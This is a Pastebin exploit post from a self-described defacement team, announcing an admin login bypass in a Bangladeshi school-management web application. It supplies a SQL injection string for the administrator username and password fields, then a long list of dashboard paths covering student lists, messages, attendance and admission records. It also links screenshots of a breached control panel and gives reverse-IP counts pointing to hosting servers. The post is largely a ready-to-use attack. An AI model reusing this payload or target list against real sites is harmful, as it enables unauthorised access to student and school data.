KingSkrupellos

Ja IT Solution JaisBD Software Authentication Bypass

May 16th, 2020
128
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.98 KB | None | 0 0
  1. ####################################################################
  2.  
  3. # Exploit Title : Ja IT Solution JaisBD Bangladesh Software Authentication Bypass
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 17 May 2020
  7. # Vendor Homepage : jaisbd.com ~ facebook.com/jaisbd/
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : High
  11. # Vulnerability Type : CWE-287 [ Improper Authentication ]
  12. CAPEC-115: Authentication Bypass
  13. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  14. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  15. # Exploit4Arab : exploit4arab.org/author/KingSkrupellos
  16. # Zone-H : zone-h.org/archive/notifier=KingSkrupellos
  17. zone-h.org/archive/notifier=CyBeRiZM
  18. # Mirror-H : mirror-h.org/search/hacker/948/
  19. mirror-h.org/search/hacker/94/
  20. mirror-h.org/search/hacker/1826/
  21. # Defacer.ID : defacer.id/archive/attacker/KingSkrupellos
  22. defacer.id/archive/team/Cyberizm-Org
  23. # Inj3ctor : 1nj3ctor.com/attacker/43/ ~ 1nj3ctor.com/attacker/59/
  24. # Aljyyosh : aljyyosh.org/hacker.php?id=KingSkrupellos
  25. aljyyosh.org/hacker.php?id=Cyberizm.Org
  26. aljyyosh.org/hacker.php?id=Cyberizm
  27. # Zone-D : zone-d.org/attacker/id/69
  28. # Pastebin : pastebin.com/u/KingSkrupellos
  29. # Cyberizm.Org : cyberizm.org/forum-exploits-vulnerabilities
  30.  
  31. ####################################################################
  32.  
  33. # Impact :
  34. ***********
  35. CWE-287 [ Improper Authentication ]
  36.  
  37. Authentication is any process by which a system verifies the identity of a user who wishes
  38. to access it.When an actor claims to have a given identity, the software does not
  39. prove or insufficiently proves that the claim is correct. Improper authentication
  40. occurs when an application improperly verifies the identity of a user.
  41. A software incorrectly validates user's login information and as a result, an attacker can
  42. gain certain privileges within the application or disclose sensitive information that allows
  43. them to access sensitive data and provoke arbitrary code execution.
  44. The weakness is introduced during Architecture and Design, Implementation stages.
  45.  
  46. CAPEC-115 [ Authentication Bypass ]
  47.  
  48. An attacker gains access to application, service, or device with the privileges
  49. of an authorized or privileged user by evading or circumventing an authentication mechanism.
  50. The attacker is therefore able to access protected data without authentication ever having taken place.
  51. This refers to an attacker gaining access equivalent to an authenticated user without ever going
  52. through an authentication procedure. This is usually the result of the attacker using an unexpected
  53. access procedure that does not go through the proper checkpoints where authentication should occur.
  54. For example, a web site might assume that all users will click through a given link in order to get to
  55. secure material and simply authenticate everyone that clicks the link. However, an attacker might be
  56. able to reach secured web content by explicitly entering the path to the content rather than clicking
  57. through the authentication link, thereby avoiding the check entirely. This attack pattern differs from
  58. other authentication attacks in that attacks of this pattern avoid authentication entirely, rather than
  59. faking authentication by exploiting flaws or by stealing credentials from legitimate users.
  60.  
  61. ####################################################################
  62.  
  63. # Authentication Bypass / Improper Authentication / Admin Panel Login Bypass Exploit :
  64. ******************************************************************************
  65. Administrator Username : x' or 1=1 or 'x'='y
  66.  
  67. Administrator Password : x' or 1=1 or 'x'='y
  68.  
  69. /login
  70. /dashboard
  71. /MenuSetting
  72. /SystemManagement/updatepost/1
  73. /dashboard/admissioninformationlist
  74. /dashboard/addSchoolList
  75. /dashboard/sliderList
  76. /dashboard/mainCategory
  77. /dashboard/subCategory
  78. /class_routine
  79. /dashboard/mediafileList
  80. /dashboard/CustomPostList
  81. /Dashboard/addnewpost
  82. /dashboard/get_post_data/1/1
  83. /dashboard/get_post_data/1/2
  84. /dashboard/get_post_data/1/3
  85. /dashboard/get_post_data/1/4
  86. /dashboard/get_post_data/1/5
  87. /dashboard/addnewnotice/1/5
  88. /dashboard/get_post_data/8/22
  89. /dashboard/get_post_data/8/23
  90. /dashboard/get_post_data/8/24
  91. /dashboard/commondatalist/2/6
  92. /dashboard/get_post_data/2/7
  93. /dashboard/get_post_data/2/8
  94. /dashboard/get_post_data/2/9
  95. /dashboard/get_post_data/3/18
  96. /dashboard/get_post_data/3/19
  97. /dashboard/get_post_data/3/20
  98. /dashboard/get_post_data/3/21
  99. /dashboard/get_post_data/3/25
  100. /dashboard/get_post_management_data/1
  101. /dashboard/get_post_management_data/2
  102. /dashboard/get_post_management_data/3
  103. /dashboard/get_post_management_data/4
  104. /dashboard/get_post_data/5/10
  105. /dashboard/get_post_data/5/12
  106. /dashboard/get_post_data/5/13
  107. /dashboard/get_post_data/6/14
  108. /dashboard/get_post_data/6/15
  109. /dashboard/gallaryList
  110. /dashboard/get_post_data/7/17
  111. /dashboard/addnewnotice/7/17
  112. /classsetting/shiftlist
  113. /classsetting/classlist
  114. /classsetting/sectionlist
  115. /classsetting/grouplist
  116. /classsetting/sessionlist
  117. /classsetting/subjectlist
  118. /classsetting/studentlist
  119. /classsetting/versionlist
  120. /student_message
  121. /attendance_report
  122. /admission_report
  123. /dashboard/checkUserRole
  124. /dashboard/checkUserProfle
  125. /SystemManagement/UpdateProfileInformation
  126.  
  127. ScreenShot Administrator Control Panel =>
  128. *****************************************
  129. https://www.upload.ee/image/11711630/jaitsolution1.png
  130.  
  131. https://www.upload.ee/image/11711633/jaitsolution2.png
  132.  
  133. https://www.upload.ee/image/11711634/jaitsolution3.png
  134.  
  135. Reverse IP Results Information =>
  136. *******************************
  137. Reverse IP results for (64.188.2.216)
  138. There are 392 domains hosted on this server.
  139.  
  140. Reverse IP results for (104.219.248.5)
  141. There are 174 domains hosted on this server.
  142.  
  143. Reverse IP results for (94.130.13.164)
  144. There are 118 domains hosted on this server.
  145.  
  146. ####################################################################
  147.  
  148. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Army
  149.  
  150. ####################################################################
Add Comment
Please, Sign In to add comment